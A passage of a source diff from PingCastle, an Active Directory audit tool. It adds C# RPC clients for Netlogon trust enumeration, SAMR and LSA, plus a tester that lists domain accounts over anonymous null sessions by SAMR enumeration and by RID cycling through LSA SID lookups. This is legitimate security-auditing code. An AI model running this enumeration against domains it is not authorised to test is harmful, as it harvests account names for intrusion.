0x08,0x00,0xf0,0xff,0x02,0x02,0x4c,0x00,0xe0,0xff,0x5c,0x5b,0x1a,0x03,0x38,0x00,0x00,0x00,0x0e,0x00,0x36,0x36,0x08,0x08,0x08,0x08,0x36,0x4c,0x00,
0xb9,0xff,0x5b,0x12,0x08,0x25,0x5c,0x12,0x08,0x25,0x5c,0x12,0x00,0xd4,0xff,0x21,0x03,0x00,0x00,0x19,0x00,0x00,0x00,0x01,0x00,0xff,0xff,0xff,0xff,
0x00,0x00,0x4c,0x00,0xce,0xff,0x5c,0x5b,0x1a,0x03,0x10,0x00,0x00,0x00,0x06,0x00,0x08,0x40,0x36,0x5b,0x12,0x00,0xdc,0xff,0x00
};
[StructLayout(LayoutKind.Sequential)]
internal struct NETLOGON_TRUSTED_DOMAIN_ARRAY
{
public int DomainCount;
public IntPtr Domains;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct DS_DOMAIN_TRUSTSW
{
public IntPtr NetbiosDomainName;
public IntPtr DnsDomainName;
public int Flags;
public int ParentIndex;
public int TrustType;
public int TrustAttributes;
public IntPtr DomainSid;
public Guid DomainGuid;
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public nrpc(bool WillUseNullSession = true)
{
Guid interfaceId = new Guid("12345678-1234-ABCD-EF00-01234567CFFB");
if (IntPtr.Size == 8)
{
InitializeStub(interfaceId, MIDL_ProcFormatStringx64, MIDL_TypeFormatStringx64, "\\pipe\\netlogon");
}
else
{
InitializeStub(interfaceId, MIDL_ProcFormatStringx86, MIDL_TypeFormatStringx86, "\\pipe\\netlogon");
}
UseNullSession = WillUseNullSession;
}
[SecurityPermission(SecurityAction.Demand, Flags = SecurityPermissionFlag.UnmanagedCode)]
~nrpc()
{
freeStub();
}
[SecurityPermission(SecurityAction.Demand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public Int32 DsrEnumerateDomainTrusts(string server, int flag, out List<TrustedDomain> domains)
{
IntPtr result = IntPtr.Zero;
domains = null;
IntPtr intptrServer = Marshal.StringToHGlobalUni(server);
NETLOGON_TRUSTED_DOMAIN_ARRAY output = new NETLOGON_TRUSTED_DOMAIN_ARRAY();
try
{
if (IntPtr.Size == 8)
{
result = NativeMethods.NdrClientCall2x64(GetStubHandle(), GetProcStringHandle(0), intptrServer, flag, ref output);
}
else
{
GCHandle handle = GCHandle.Alloc(output, GCHandleType.Pinned);
IntPtr tempValuePointer = handle.AddrOfPinnedObject();
try
{
result = CallNdrClientCall2x86(0, intptrServer, new IntPtr((int)flag), tempValuePointer);
// each pinvoke work on a copy of the arguments (without an out specifier)
// get back the data
output = (NETLOGON_TRUSTED_DOMAIN_ARRAY)Marshal.PtrToStructure(tempValuePointer, typeof(NETLOGON_TRUSTED_DOMAIN_ARRAY));
}
finally
{
handle.Free();
}
}
}
catch (SEHException)
{
return Marshal.GetExceptionCode();
}
finally
{
if (intptrServer != IntPtr.Zero)
Marshal.FreeHGlobal(intptrServer);
}
domains = DomainArrayToTrustedDomainList(output);
return (int) result.ToInt64();
}
[SecurityPermission(SecurityAction.Demand, Flags = SecurityPermissionFlag.UnmanagedCode)]
private List<TrustedDomain> DomainArrayToTrustedDomainList(NETLOGON_TRUSTED_DOMAIN_ARRAY trustedDomainArray)
{
List<TrustedDomain> output = new List<TrustedDomain>();
int size = Marshal.SizeOf(typeof(DS_DOMAIN_TRUSTSW));
for (int i = 0; i < trustedDomainArray.DomainCount; i++)
{
DS_DOMAIN_TRUSTSW trust = (DS_DOMAIN_TRUSTSW) Marshal.PtrToStructure(new IntPtr(trustedDomainArray.Domains.ToInt64() + size * i), typeof(DS_DOMAIN_TRUSTSW));
TrustedDomain domain = new TrustedDomain();
if (trust.DnsDomainName != IntPtr.Zero)
{
domain.DnsDomainName = Marshal.PtrToStringUni(trust.DnsDomainName);
FreeMemory(trust.DnsDomainName);
}
if (trust.NetbiosDomainName != IntPtr.Zero)
{
domain.NetbiosDomainName = Marshal.PtrToStringUni(trust.NetbiosDomainName);
FreeMemory(trust.NetbiosDomainName);
}
domain.Flags = (TrustedDomainFlag) trust.Flags;
domain.ParentIndex = trust.ParentIndex;
domain.TrustAttributes = trust.TrustAttributes;
domain.TrustType = trust.TrustType;
domain.DomainGuid = trust.DomainGuid;
if (trust.DomainSid != IntPtr.Zero)
{
domain.DomainSid = new SecurityIdentifier(trust.DomainSid);
FreeMemory(trust.DomainSid);
}
output.Add(domain);
}
FreeMemory(trustedDomainArray.Domains);
return output;
}
}
}

230
RPC/nullsession.cs Normal file
View File

@ -0,0 +1,230 @@
//
// Copyright (c) Ping Castle. All rights reserved.
// https://www.pingcastle.com
//
// Licensed under the Non-Profit OSL. See LICENSE file in the project root for full license information.
//
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Permissions;
using System.Security.Principal;
using System.Text;
namespace PingCastle.RPC
{
public enum TypeOfEnumeration
{
Samr,
Lsa,
}
public class NullSessionTester
{
public delegate void Enumerate(NTAccount account);
public Enumerate EnumerateCallback { get; set; }
public string Server { get; set; }
public uint RPCTimeOut { get; set; }
public NullSessionTester(string server, Enumerate enumerateCallback = null)
{
Server = server;
EnumerateCallback = enumerateCallback;
}
public bool EnumerateAccount(int MaximumNumber = int.MaxValue)
{
if (EnumerateAccount(TypeOfEnumeration.Samr, MaximumNumber))
return true;
return EnumerateAccount(TypeOfEnumeration.Lsa, MaximumNumber);
}
public bool EnumerateAccount(TypeOfEnumeration method, int MaximumNumber = int.MaxValue)
{
if (method == TypeOfEnumeration.Samr)
{
return EnumerateAccountUsingSamr(method, MaximumNumber);
}
else if (method == TypeOfEnumeration.Lsa)
{
return EnumerateAccountUsingLsa(method, MaximumNumber);
}
return false;
}
[SecurityPermission(SecurityAction.Demand, Flags = SecurityPermissionFlag.UnmanagedCode)]
private bool EnumerateAccountUsingLsa(TypeOfEnumeration method, int MaximumNumber)
{
Trace.WriteLine("EnumerateAccountUsingLsa");
int UserEnumerated = 0;
Int32 returnCode;
IntPtr PolicyHandle = IntPtr.Zero;
lsa lsa = new lsa();
lsa.RPCTimeOut = this.RPCTimeOut;
returnCode = lsa.LsarOpenPolicy(Server, 0x00000801, out PolicyHandle);
if (returnCode != 0)
{
Trace.WriteLine("LsarOpenPolicy " + returnCode);
return false;
}
try
{
LSA_DOMAIN_INFORMATION PolicyInformation;
returnCode = lsa.LsarQueryInformationPolicy(PolicyHandle, 5, out PolicyInformation);
if (returnCode != 0)
{
Trace.WriteLine("LsarQueryInformationPolicy " + returnCode);
return false;
}
uint currentRid = 500;
int iteration = 0;
// allows 10*1000 sid non resolved
int retrycount = 0;
while ((returnCode == 0 || returnCode == 0x00000107 || (retrycount < 10 && returnCode == -1073741709)) && UserEnumerated < MaximumNumber)
{
Trace.WriteLine("LsarLookupSids iteration " + iteration++);
SecurityIdentifier[] enumBuffer = new SecurityIdentifier[1000];
for (int i = 0; i < enumBuffer.Length; i++)
{
enumBuffer[i] = BuildSIDFromDomainSidAndRid(PolicyInformation.DomainSid, currentRid++);
}
UInt32 MappedCount;
LSA_LOOKUP_RESULT[] LookupResult;
returnCode = lsa.LsarLookupSids(PolicyHandle, enumBuffer, out LookupResult, 2, out MappedCount);
if (returnCode == 0 || returnCode == 0x00000107)
{
retrycount = 0;
for (int i = 0; i < enumBuffer.Length && UserEnumerated < MaximumNumber; i++)
{
if (LookupResult[i].Use == SID_NAME_USE.SidTypeUser && !String.IsNullOrEmpty(LookupResult[i].TranslatedName))
{
UserEnumerated++;
Trace.WriteLine("User:" + LookupResult[i].TranslatedName);
if (EnumerateCallback != null)
{
EnumerateCallback(new NTAccount(LookupResult[i].DomainName, LookupResult[i].TranslatedName));
}
}
}
}
else
{
retrycount++;
Trace.WriteLine("LsarLookupSids " + returnCode);
}
}
}
finally
{
returnCode = lsa.LsarClose(ref PolicyHandle);
}
Trace.WriteLine("EnumerateAccountUsingLsa done");
return UserEnumerated > 0;
}
[SecurityPermission(SecurityAction.Demand, Flags = SecurityPermissionFlag.UnmanagedCode)]
private bool EnumerateAccountUsingSamr(TypeOfEnumeration method, int MaximumNumber)
{
Trace.WriteLine("EnumerateAccountUsingSamr");
int UserEnumerated = 0;
IntPtr ServerHandle = IntPtr.Zero;
samr sam = new samr();
sam.RPCTimeOut = this.RPCTimeOut;
Int32 returnCode;
returnCode = sam.SamrConnect(Server, out ServerHandle, 0x20030);
if (returnCode != 0)
{
Trace.WriteLine("SamrConnect " + returnCode);
return false;
}
try
{
IntPtr enumerationContext = IntPtr.Zero;
SAMR_ENUMERATION_ENTRY[] Buffer = null;
UInt32 CountReturned = 0;
returnCode = sam.SamrEnumerateDomainsInSamServer(ServerHandle, ref enumerationContext, out Buffer, 10000, out CountReturned);
if (returnCode != 0)
{
Trace.WriteLine("SamrEnumerateDomainsInSamServer " + returnCode);
return false;
}
for (ulong i = 0; i < CountReturned; i++)
{
Trace.WriteLine("Domain:" + Buffer[i].Name);
SecurityIdentifier DomainId;
IntPtr DomainHandle = IntPtr.Zero;
IntPtr enumerationContextUser = IntPtr.Zero;
SAMR_ENUMERATION_ENTRY[] EnumerationBuffer = null;
UInt32 UserCount = 0;
returnCode = sam.SamrLookupDomainInSamServer(ServerHandle, Buffer[i].Name, out DomainId);
if (returnCode < 0)
{
Trace.WriteLine("SamrLookupDomainInSamServer " + returnCode);
continue;
}
returnCode = sam.SamrOpenDomain(ServerHandle, 0x100, DomainId, out DomainHandle);
if (returnCode < 0)
{
Trace.WriteLine("SamrOpenDomain " + returnCode);
continue;
}
try
{
int iteration = 0;
returnCode = 0x00000105;
while (returnCode == 0x00000105 && UserEnumerated < MaximumNumber)
{
Trace.WriteLine("SamrEnumerateUsersInDomain iteration " + iteration++);
returnCode = sam.SamrEnumerateUsersInDomain(DomainHandle, ref enumerationContextUser, 0, out EnumerationBuffer, 10000, out UserCount);
if ((returnCode == 0 || returnCode == 0x00000105) && EnumerationBuffer != null)
{
for (int j = 0; j < EnumerationBuffer.Length && UserEnumerated++ < MaximumNumber; j++)
{
Trace.WriteLine("User:" + EnumerationBuffer[j].Name);
if (EnumerateCallback != null)
{
EnumerateCallback(new NTAccount(Buffer[i].Name, EnumerationBuffer[j].Name));
}
}
}
}
Trace.WriteLine("SamrEnumerateUsersInDomain " + returnCode);
}
finally
{
sam.SamrCloseHandle(ref DomainHandle);
}
}
}
finally
{
sam.SamrCloseHandle(ref ServerHandle);
}
Trace.WriteLine("EnumerateAccountUsingSamr done");
return UserEnumerated > 0;
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public static SecurityIdentifier BuildSIDFromDomainSidAndRid(SecurityIdentifier DomainSid, UInt32 Rid)
{
byte[] sidByteForm = new byte[SecurityIdentifier.MaxBinaryLength];
DomainSid.GetBinaryForm(sidByteForm, 0);
GCHandle handle = GCHandle.Alloc(sidByteForm, GCHandleType.Pinned);
IntPtr sidIntPtr = handle.AddrOfPinnedObject();
IntPtr SubAuthorityCountIntPtr = NativeMethods.GetSidSubAuthorityCount(sidIntPtr);
byte SubAuthorityCount = Marshal.ReadByte(SubAuthorityCountIntPtr);
Marshal.WriteByte(SubAuthorityCountIntPtr, ++SubAuthorityCount);
IntPtr SubAuthorityIntPtr = NativeMethods.GetSidSubAuthority(sidIntPtr, (uint)SubAuthorityCount - 1);
Marshal.WriteInt32(SubAuthorityIntPtr, (int)Rid);
SecurityIdentifier output = new SecurityIdentifier(sidIntPtr);
handle.Free();
return output;
}
}
}

323
RPC/rpcapi.cs Normal file
View File

@ -0,0 +1,323 @@
//
// Copyright (c) Ping Castle. All rights reserved.
// https://www.pingcastle.com
//
// Licensed under the Non-Profit OSL. See LICENSE file in the project root for full license information.
//
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security.Permissions;
using System.Text;
namespace PingCastle.RPC
{
public abstract class rpcapi
{
private byte[] MIDL_ProcFormatString;
private byte[] MIDL_TypeFormatString;
private GCHandle procString;
private GCHandle formatString;
private GCHandle stub;
private GCHandle faultoffsets;
private GCHandle clientinterface;
private GCHandle bindinghandle;
private string PipeName;
// important: keep a reference on delegate to avoid CallbackOnCollectedDelegate exception
bind BindDelegate;
unbind UnbindDelegate;
allocmemory AllocateMemoryDelegate = AllocateMemory;
freememory FreeMemoryDelegate = FreeMemory;
public bool UseNullSession { get; set; }
// 5 seconds
public UInt32 RPCTimeOut = 5000;
[StructLayout(LayoutKind.Sequential)]
private struct COMM_FAULT_OFFSETS
{
public short CommOffset;
public short FaultOffset;
}
[System.Diagnostics.CodeAnalysis.SuppressMessage("Microsoft.Design", "CA1049:TypesThatOwnNativeResourcesShouldBeDisposable"), StructLayout(LayoutKind.Sequential)]
private struct GENERIC_BINDING_ROUTINE_PAIR
{
public IntPtr Bind;
public IntPtr Unbind;
}
[StructLayout(LayoutKind.Sequential)]
private struct RPC_VERSION
{
public ushort MajorVersion;
public ushort MinorVersion;
public static readonly RPC_VERSION INTERFACE_VERSION = new RPC_VERSION() { MajorVersion = 1, MinorVersion = 0 };
public static readonly RPC_VERSION SYNTAX_VERSION = new RPC_VERSION() { MajorVersion = 2, MinorVersion = 0 };
public RPC_VERSION(ushort InterfaceVersionMajor, ushort InterfaceVersionMinor)
{
MajorVersion = InterfaceVersionMajor;
MinorVersion = InterfaceVersionMinor;
}
}
[StructLayout(LayoutKind.Sequential)]
private struct RPC_SYNTAX_IDENTIFIER
{
public Guid SyntaxGUID;
public RPC_VERSION SyntaxVersion;
}
[StructLayout(LayoutKind.Sequential)]
private struct RPC_CLIENT_INTERFACE
{
public uint Length;
public RPC_SYNTAX_IDENTIFIER InterfaceId;
public RPC_SYNTAX_IDENTIFIER TransferSyntax;
public IntPtr /*PRPC_DISPATCH_TABLE*/ DispatchTable;
public uint RpcProtseqEndpointCount;
public IntPtr /*PRPC_PROTSEQ_ENDPOINT*/ RpcProtseqEndpoint;
public IntPtr Reserved;
public IntPtr InterpreterInfo;
public uint Flags;
public static readonly Guid IID_SYNTAX = new Guid(0x8A885D04u, 0x1CEB, 0x11C9, 0x9F, 0xE8, 0x08, 0x00, 0x2B,
0x10,
0x48, 0x60);
public RPC_CLIENT_INTERFACE(Guid iid, ushort InterfaceVersionMajor = 1, ushort InterfaceVersionMinor = 0)
{
Length = (uint)Marshal.SizeOf(typeof(RPC_CLIENT_INTERFACE));
InterfaceId = new RPC_SYNTAX_IDENTIFIER() { SyntaxGUID = iid, SyntaxVersion = new RPC_VERSION(InterfaceVersionMajor, InterfaceVersionMinor) };
TransferSyntax = new RPC_SYNTAX_IDENTIFIER() { SyntaxGUID = IID_SYNTAX, SyntaxVersion = RPC_VERSION.SYNTAX_VERSION };
DispatchTable = IntPtr.Zero;
RpcProtseqEndpointCount = 0u;
RpcProtseqEndpoint = IntPtr.Zero;
Reserved = IntPtr.Zero;
InterpreterInfo = IntPtr.Zero;
Flags = 0u;
}
}
[StructLayout(LayoutKind.Sequential)]
private struct MIDL_STUB_DESC
{
public IntPtr /*RPC_CLIENT_INTERFACE*/ RpcInterfaceInformation;
public IntPtr pfnAllocate;
public IntPtr pfnFree;
public IntPtr pAutoBindHandle;
public IntPtr /*NDR_RUNDOWN*/ apfnNdrRundownRoutines;
public IntPtr /*GENERIC_BINDING_ROUTINE_PAIR*/ aGenericBindingRoutinePairs;
public IntPtr /*EXPR_EVAL*/ apfnExprEval;
public IntPtr /*XMIT_ROUTINE_QUINTUPLE*/ aXmitQuintuple;
public IntPtr pFormatTypes;
public int fCheckBounds;
/* Ndr library version. */
public uint Version;
public IntPtr /*MALLOC_FREE_STRUCT*/ pMallocFreeStruct;
public int MIDLVersion;
public IntPtr CommFaultOffsets;
// New fields for version 3.0+
public IntPtr /*USER_MARSHAL_ROUTINE_QUADRUPLE*/ aUserMarshalQuadruple;
// Notify routines - added for NT5, MIDL 5.0
public IntPtr /*NDR_NOTIFY_ROUTINE*/ NotifyRoutineTable;
public IntPtr mFlags;
// International support routines - added for 64bit post NT5
public IntPtr /*NDR_CS_ROUTINES*/ CsRoutineTables;
public IntPtr ProxyServerInfo;
public IntPtr /*NDR_EXPR_DESC*/ pExprInfo;
// Fields up to now present in win2000 release.
public MIDL_STUB_DESC(IntPtr pFormatTypesPtr, IntPtr RpcInterfaceInformationPtr,
IntPtr pfnAllocatePtr, IntPtr pfnFreePtr, IntPtr aGenericBindingRoutinePairsPtr)
{
pFormatTypes = pFormatTypesPtr;
RpcInterfaceInformation = RpcInterfaceInformationPtr;
CommFaultOffsets = IntPtr.Zero;
pfnAllocate = pfnAllocatePtr;
pfnFree = pfnFreePtr;
pAutoBindHandle = IntPtr.Zero;
apfnNdrRundownRoutines = IntPtr.Zero;
aGenericBindingRoutinePairs = aGenericBindingRoutinePairsPtr;
apfnExprEval = IntPtr.Zero;
aXmitQuintuple = IntPtr.Zero;
fCheckBounds = 1;
Version = 0x50002u;
pMallocFreeStruct = IntPtr.Zero;
MIDLVersion = 0x8000253;
aUserMarshalQuadruple = IntPtr.Zero;
NotifyRoutineTable = IntPtr.Zero;
mFlags = new IntPtr(0x00000001);
CsRoutineTables = IntPtr.Zero;
ProxyServerInfo = IntPtr.Zero;
pExprInfo = IntPtr.Zero;
}
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
protected void InitializeStub(Guid interfaceID, byte[] MIDL_ProcFormatString, byte[] MIDL_TypeFormatString, string pipe, ushort MajorVerson = 1, ushort MinorVersion = 0)
{
this.MIDL_ProcFormatString = MIDL_ProcFormatString;
this.MIDL_TypeFormatString = MIDL_TypeFormatString;
PipeName = pipe;
procString = GCHandle.Alloc(this.MIDL_ProcFormatString, GCHandleType.Pinned);
RPC_CLIENT_INTERFACE clientinterfaceObject = new RPC_CLIENT_INTERFACE(interfaceID, MajorVerson, MinorVersion);
GENERIC_BINDING_ROUTINE_PAIR bindingObject = new GENERIC_BINDING_ROUTINE_PAIR();
// important: keep a reference to avoid CallbakcOnCollectedDelegate Exception
BindDelegate = Bind;
UnbindDelegate = Unbind;
bindingObject.Bind = Marshal.GetFunctionPointerForDelegate((bind)BindDelegate);
bindingObject.Unbind = Marshal.GetFunctionPointerForDelegate((unbind)UnbindDelegate);
faultoffsets = GCHandle.Alloc(new COMM_FAULT_OFFSETS() { CommOffset = -1, FaultOffset = -1 }, GCHandleType.Pinned);
clientinterface = GCHandle.Alloc(clientinterfaceObject, GCHandleType.Pinned);
formatString = GCHandle.Alloc(MIDL_TypeFormatString, GCHandleType.Pinned);
bindinghandle = GCHandle.Alloc(bindingObject, GCHandleType.Pinned);
MIDL_STUB_DESC stubObject = new MIDL_STUB_DESC(formatString.AddrOfPinnedObject(),
clientinterface.AddrOfPinnedObject(),
Marshal.GetFunctionPointerForDelegate(AllocateMemoryDelegate),
Marshal.GetFunctionPointerForDelegate(FreeMemoryDelegate),
bindinghandle.AddrOfPinnedObject());
stub = GCHandle.Alloc(stubObject, GCHandleType.Pinned);
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
protected void freeStub()
{
procString.Free();
faultoffsets.Free();
clientinterface.Free();
formatString.Free();
bindinghandle.Free();
stub.Free();
}
delegate IntPtr allocmemory(int size);
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
protected static IntPtr AllocateMemory(int size)
{
IntPtr memory = Marshal.AllocHGlobal(size);
//Trace.WriteLine("allocating " + memory.ToString());
return memory;
}
delegate void freememory(IntPtr memory);
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
protected static void FreeMemory(IntPtr memory)
{
//Trace.WriteLine("freeing " + memory.ToString());
Marshal.FreeHGlobal(memory);
}
delegate IntPtr bind(IntPtr IntPtrserver);
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
protected IntPtr Bind (IntPtr IntPtrserver)
{
string server = Marshal.PtrToStringUni(IntPtrserver);
IntPtr bindingstring = IntPtr.Zero;
IntPtr binding = IntPtr.Zero;
Int32 status;
Trace.WriteLine("Binding to " + server + " " + PipeName);
status = NativeMethods.RpcStringBindingCompose(null, "ncacn_np", server, PipeName, null, out bindingstring);
if (status != 0)
{
Trace.WriteLine("RpcStringBindingCompose failed with status 0x" + status.ToString("x"));
return IntPtr.Zero;
}
status = NativeMethods.RpcBindingFromStringBinding(Marshal.PtrToStringUni(bindingstring), out binding);
NativeMethods.RpcBindingFree(ref bindingstring);
if (status != 0)
{
Trace.WriteLine("RpcBindingFromStringBinding failed with status 0x" + status.ToString("x"));
return IntPtr.Zero;
}
if (UseNullSession)
{
// note: windows xp doesn't support user or domain = "" => return 0xE
NativeMethods.SEC_WINNT_AUTH_IDENTITY identity = new NativeMethods.SEC_WINNT_AUTH_IDENTITY();
identity.User = "";
identity.UserLength = identity.User.Length * 2;
identity.Domain = "";
identity.DomainLength = identity.Domain.Length * 2;
identity.Password = "";
identity.Flags = 2;
NativeMethods.RPC_SECURITY_QOS qos = new NativeMethods.RPC_SECURITY_QOS();
qos.Version = 1;
qos.ImpersonationType = 3;
GCHandle qoshandle = GCHandle.Alloc(qos, GCHandleType.Pinned);
// 9 = negotiate , 10 = ntlm ssp
status = NativeMethods.RpcBindingSetAuthInfoEx(binding, server, 0, 9, ref identity, 0, ref qos);
qoshandle.Free();
if (status != 0)
{
Trace.WriteLine("RpcBindingSetAuthInfoEx failed with status 0x" + status.ToString("x"));
Unbind(IntPtrserver, binding);
return IntPtr.Zero;
}
}
status = NativeMethods.RpcBindingSetOption(binding, 12, RPCTimeOut);
if (status != 0)
{
Trace.WriteLine("RpcBindingSetOption failed with status 0x" + status.ToString("x"));
}
Trace.WriteLine("binding ok (handle=" + binding + ")");
return binding;
}
delegate void unbind(IntPtr IntPtrserver, IntPtr hBinding);
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
protected static void Unbind(IntPtr IntPtrserver, IntPtr hBinding)
{
string server = Marshal.PtrToStringUni(IntPtrserver);
Trace.WriteLine("unbinding " + server);
NativeMethods.RpcBindingFree(ref hBinding);
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
protected IntPtr GetProcStringHandle(int offset)
{
return Marshal.UnsafeAddrOfPinnedArrayElement(MIDL_ProcFormatString, offset);
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
protected IntPtr GetStubHandle()
{
return stub.AddrOfPinnedObject();
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
protected IntPtr CallNdrClientCall2x86(int offset, params IntPtr[] args)
{
GCHandle stackhandle = GCHandle.Alloc(args, GCHandleType.Pinned);
IntPtr result;
try
{
result = NativeMethods.NdrClientCall2x86(GetStubHandle(), GetProcStringHandle(offset), stackhandle.AddrOfPinnedObject());
}
finally
{
stackhandle.Free();
}
return result;
}
}
}

431
RPC/samr.cs Normal file
View File

@ -0,0 +1,431 @@
//
// Copyright (c) Ping Castle. All rights reserved.
// https://www.pingcastle.com
//
// Licensed under the Non-Profit OSL. See LICENSE file in the project root for full license information.
//
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Runtime.ConstrainedExecution;
using System.Runtime.InteropServices;
using System.Security.Permissions;
using System.Security.Principal;
using System.Text;
namespace PingCastle.RPC
{
[DebuggerDisplay("{Name}")]
public class SAMR_ENUMERATION_ENTRY
{
public long RelativeId;
public string Name;
}
public class samr : rpcapi
{
private static byte[] MIDL_ProcFormatStringx86 = new byte[] {
0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x31,0x04,0x00,0x00,0x00,0x5c,0x22,0x00,0x40,0x00,0x44,0x04,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0x0a,0x00,0x00,0x00,0x02,0x00,0x10,0x01,0x04,0x00,0x0a,0x00,0x48,0x00,0x08,0x00,0x08,0x00,0x70,0x00,0x0c,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,
0x01,0x00,0x08,0x00,0x30,0xe0,0x00,0x00,0x00,0x00,0x38,0x00,0x40,0x00,0x44,0x02,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x01,0x00,0x00,0x12,0x00,
0x70,0x00,0x04,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x02,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x03,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x04,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x48,0x00,0x00,0x00,0x00,0x05,0x00,0x10,0x00,0x30,0x40,0x00,0x00,0x00,0x00,0x24,0x00,0x08,0x00,0x47,0x04,0x08,0x07,0x01,0x00,0x01,0x00,0x00,0x00,
0x08,0x00,0x00,0x00,0x16,0x00,0x0b,0x01,0x04,0x00,0x30,0x00,0x13,0x20,0x08,0x00,0x46,0x00,0x70,0x00,0x0c,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,
0x06,0x00,0x18,0x00,0x30,0x40,0x00,0x00,0x00,0x00,0x48,0x00,0x40,0x00,0x45,0x06,0x08,0x03,0x01,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x16,0x00,
0x58,0x01,0x04,0x00,0x08,0x00,0x13,0x20,0x08,0x00,0x7c,0x00,0x48,0x00,0x0c,0x00,0x08,0x00,0x50,0x21,0x10,0x00,0x08,0x00,0x70,0x00,0x14,0x00,0x08,0x00,
0x00,0x48,0x00,0x00,0x00,0x00,0x07,0x00,0x14,0x00,0x30,0x40,0x00,0x00,0x00,0x00,0x2c,0x00,0x40,0x00,0x46,0x05,0x08,0x05,0x00,0x00,0x01,0x00,0x00,0x00,
0x08,0x00,0x00,0x00,0x16,0x00,0x48,0x00,0x04,0x00,0x08,0x00,0x0b,0x01,0x08,0x00,0x6a,0x00,0x10,0x01,0x0c,0x00,0xee,0x00,0x70,0x00,0x10,0x00,0x08,0x00,
0x00,0x48,0x00,0x00,0x00,0x00,0x08,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,
0x00,0x00,0x00,0x00,0x09,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,
0x00,0x00,0x0a,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,
0x0b,0x00,0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0c,0x00,
0x04,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x08,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x0d,0x00,0x1c,0x00,
0x30,0x40,0x00,0x00,0x00,0x00,0x50,0x00,0x40,0x00,0x45,0x07,0x08,0x03,0x01,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x16,0x00,0x58,0x01,0x04,0x00,
0x08,0x00,0x48,0x00,0x08,0x00,0x08,0x00,0x13,0x20,0x0c,0x00,0x7c,0x00,0x48,0x00,0x10,0x00,0x08,0x00,0x50,0x21,0x14,0x00,0x08,0x00,0x70,0x00,0x18,0x00,
0x08,0x00,0x00
};
private static byte[] MIDL_ProcFormatStringx64 = new byte[] {
0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x31,0x08,0x00,0x00,0x00,0x5c,0x22,0x00,0x40,0x00,0x44,0x04,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x0a,0x00,0x00,0x00,0x02,0x00,0x10,0x01,0x08,0x00,0x0a,0x00,0x48,0x00,0x10,0x00,0x08,0x00,0x70,0x00,0x18,0x00,0x08,0x00,0x00,0x48,0x00,0x00,
0x00,0x00,0x01,0x00,0x10,0x00,0x30,0xe0,0x00,0x00,0x00,0x00,0x38,0x00,0x40,0x00,0x44,0x02,0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x01,
0x00,0x00,0x12,0x00,0x70,0x00,0x08,0x00,0x08,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x02,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,
0x0a,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x03,0x00,0x08,0x00,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,
